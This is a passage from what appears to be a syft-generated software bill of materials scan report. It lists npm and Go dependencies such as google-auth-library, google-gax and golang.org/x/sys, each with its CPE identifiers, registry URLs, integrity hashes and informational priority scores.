|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/glob-parent@6.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz
|
|
integrity: sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==
|
|
dependencies:
|
|
is-glob: ^4.0.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0dbbd23e15d1e62b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
startLine: 0
|
|
message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
|
|
title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8
|
|
description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7890a665ce9e5849
|
|
name: golang.org/x/sys
|
|
version: v0.0.0-20220715151400-c0bba94af5f8
|
|
type: go-module
|
|
foundBy: go-module-binary-cataloger
|
|
locations:
|
|
- path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: go
|
|
cpes:
|
|
- cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8
|
|
metadataType: go-module-buildinfo-entry
|
|
metadata:
|
|
goCompiledVersion: go1.20.12
|
|
architecture: arm64
|
|
h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=
|
|
mainModule: github.com/evanw/esbuild
|
|
goCryptoSettings:
|
|
- standard-crypto
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5c6e328f37ad400d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/esbuild/bin/esbuild
|
|
startLine: 0
|
|
message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
|
|
title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8
|
|
description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 839067488ff020a0
|
|
name: golang.org/x/sys
|
|
version: v0.0.0-20220715151400-c0bba94af5f8
|
|
type: go-module
|
|
foundBy: go-module-binary-cataloger
|
|
locations:
|
|
- path: /node_modules/esbuild/bin/esbuild
|
|
accessPath: /node_modules/esbuild/bin/esbuild
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: go
|
|
cpes:
|
|
- cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8
|
|
metadataType: go-module-buildinfo-entry
|
|
metadata:
|
|
goCompiledVersion: go1.20.12
|
|
architecture: arm64
|
|
h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=
|
|
mainModule: github.com/evanw/esbuild
|
|
goCryptoSettings:
|
|
- standard-crypto
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 59d2bd18fdd1d561
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: google-auth-library 9.15.1'
|
|
title: google-auth-library 9.15.1
|
|
description: 'Package discovered: google-auth-library 9.15.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4fb04863a4dacd73
|
|
name: google-auth-library
|
|
version: 9.15.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:google-auth-library:google-auth-library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google-auth-library:google_auth_library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_auth_library:google-auth-library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_auth_library:google_auth_library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google-auth:google-auth-library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google-auth:google_auth_library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_auth:google-auth-library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_auth:google_auth_library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google:google-auth-library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google:google_auth_library:9.15.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/google-auth-library@9.15.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.15.1.tgz
|
|
integrity: sha512-Jb6Z0+nvECVz+2lzSMt9u98UsoakXxA2HGHMCxh+so3n90XgYWkq5dur19JAJV7ONiJY22yBTyJB1TSkvPq9Ng==
|
|
dependencies:
|
|
base64-js: ^1.3.0
|
|
ecdsa-sig-formatter: ^1.0.11
|
|
gaxios: ^6.1.1
|
|
gcp-metadata: ^6.1.0
|
|
gtoken: ^7.0.0
|
|
jws: ^4.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f744ca691ff58390
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: google-gax 4.6.1'
|
|
title: google-gax 4.6.1
|
|
description: 'Package discovered: google-gax 4.6.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3344aade71052029
|
|
name: google-gax
|
|
version: 4.6.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:google-gax:google-gax:4.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google-gax:google_gax:4.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_gax:google-gax:4.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_gax:google_gax:4.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google:google-gax:4.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google:google_gax:4.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/google-gax@4.6.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/google-gax/-/google-gax-4.6.1.tgz
|
|
integrity: sha512-V6eky/xz2mcKfAd1Ioxyd6nmA61gao3n01C+YeuIwu3vzM9EDR6wcVzMSIbLMDXWeoi9SHYctXuKYC5uJUT3eQ==
|
|
dependencies:
|
|
'@grpc/grpc-js': ^1.10.9
|
|
'@grpc/proto-loader': ^0.7.13
|
|
'@types/long': ^4.0.0
|
|
abort-controller: ^3.0.0
|
|
duplexify: ^4.0.0
|
|
google-auth-library: ^9.3.0
|
|
node-fetch: ^2.7.0
|
|
object-hash: ^3.0.0
|
|
proto3-json-serializer: ^2.0.2
|
|
protobufjs: ^7.3.2
|
|
retry-request: ^7.0.0
|
|
uuid: ^9.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 38ca80e4adb1c1ba
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: google-logging-utils 0.0.2'
|
|
title: google-logging-utils 0.0.2
|
|
description: 'Package discovered: google-logging-utils 0.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c45a9f7f7c5a1d26
|
|
name: google-logging-utils
|
|
version: 0.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:google-logging-utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google-logging-utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_logging_utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_logging_utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google-logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google-logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google_logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google:google-logging-utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:google:google_logging_utils:0.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/google-logging-utils@0.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-0.0.2.tgz
|
|
integrity: sha512-NEgUnEcBiP5HrPzufUkBzJOD/Sxsco3rLNo1F1TNf7ieU8ryUzBhqba8r756CjLX7rn3fHl6iLEwPYuqpoKgQQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bb6c934fdca5487f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: gopd 1.2.0'
|
|
title: gopd 1.2.0
|
|
description: 'Package discovered: gopd 1.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2f2433574e565258
|
|
name: gopd
|
|
version: 1.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:gopd:gopd:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/gopd@1.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz
|
|
integrity: sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 30861bd8904bacc9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: graceful-fs 4.2.11'
|
|
title: graceful-fs 4.2.11
|
|
description: 'Package discovered: graceful-fs 4.2.11'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 45319b4c36cfb339
|
|
name: graceful-fs
|
|
version: 4.2.11
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:graceful-fs:graceful-fs:4.2.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:graceful-fs:graceful_fs:4.2.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:graceful_fs:graceful-fs:4.2.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:graceful_fs:graceful_fs:4.2.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:graceful:graceful-fs:4.2.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:graceful:graceful_fs:4.2.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/graceful-fs@4.2.11
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz
|
|
integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a916a255ccf430d7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: gtoken 7.1.0'
|
|
title: gtoken 7.1.0
|
|
description: 'Package discovered: gtoken 7.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fe4d11ddc8ba95f7
|
|
name: gtoken
|
|
version: 7.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:gtoken:gtoken:7.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/gtoken@7.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz
|
|
integrity: sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==
|
|
dependencies:
|
|
gaxios: ^6.0.0
|
|
jws: ^4.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d28454794acf7740
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: has-symbols 1.1.0'
|
|
title: has-symbols 1.1.0
|
|
description: 'Package discovered: has-symbols 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fcd80b2c54be3c8f
|
|
name: has-symbols
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:has-symbols:has-symbols:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has-symbols:has_symbols:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has_symbols:has-symbols:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has_symbols:has_symbols:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has:has-symbols:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has:has_symbols:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/has-symbols@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz
|
|
integrity: sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f33597863ab8f3be
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: has-tostringtag 1.0.2'
|
|
title: has-tostringtag 1.0.2
|
|
description: 'Package discovered: has-tostringtag 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7749e9981a33e1c1
|
|
name: has-tostringtag
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:has-tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has-tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has_tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has_tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has:has-tostringtag:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:has:has_tostringtag:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/has-tostringtag@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz
|
|
integrity: sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==
|
|
dependencies:
|
|
has-symbols: ^1.0.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 96e286f1b1295263
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: hasown 2.0.3'
|
|
title: hasown 2.0.3
|
|
description: 'Package discovered: hasown 2.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6f96b80a7d603954
|
|
name: hasown
|
|
version: 2.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:hasown:hasown:2.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/hasown@2.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz
|
|
integrity: sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==
|
|
dependencies:
|
|
function-bind: ^1.1.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e883502c6fb5e040
|
|
